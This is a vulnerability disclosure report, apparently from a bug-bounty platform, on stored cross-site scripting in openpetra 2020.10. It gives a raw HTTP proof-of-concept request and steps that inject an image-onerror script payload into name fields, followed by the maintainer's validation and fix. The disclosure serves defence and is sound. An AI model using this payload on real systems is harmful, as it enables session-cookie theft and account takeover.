Cross-site Scripting (XSS) - Stored in openpetra/openpetra


Reported on

Oct 29th 2021


Multiple Stored XSS at openpetra 2020.10

Proof of Concept

// PoC.req
POST /api/serverMSponsorship.asmx/TSponsorshipWebConnector_MaintainChild HTTP/1.1
Cookie: ASP.NET_SessionId=AEC44A33068E58B5DE583F3E; OpenPetraSessionID=b987029b-104f-45f1-aa29-339a49d0d55a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 287
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"APartnerKey":-1,"ASponsorshipStatus":"CHILDREN_HOME","AFirstName":"\"><iMg SrC=\"x\" oNeRRor=\"alert(1);\">","AFamilyName":"\"><iMg SrC=\"x\" oNeRRor=\"alert(1);\">","AGender":null,"ADateOfBirth":"null","AUserId":"","APhoto":"","new_photo":"","ALedgerNumber":"43","AUploadPhoto":false}

Step to Reproduct


Goto Sponsorship choose to Add new child

At field First name and Surname input with payload : "><iMg SrC="x" oNeRRor="alert(1);">


Goto Partner choose to Add new partner

At field Title , First name and Family name input with payload : "><iMg SrC="x" oNeRRor="alert(1);">

The XSS will trigger when user goto Donations choose to Add new transaction and search Donor Key with name of partner


This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We created a GitHub Issue asking the maintainers to create a 2 years ago
We have contacted a member of the openpetra team and are waiting to hear back 2 years ago
openpetra/openpetra maintainer validated this vulnerability 2 years ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
openpetra/openpetra maintainer
2 years ago

I don't see it as a high risk, because you need to be registered user to be able to add sponsored children. But I see the problem in general, that we have to validate all input coming from the web. I will file a ticket at Github for the OpenPetra project, and I will fix it for the next release. Thank you for taking the time and reporting the issue!

2 years ago


You’re welcome ^^.

openpetra/openpetra maintainer marked this as fixed with commit 82152f 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation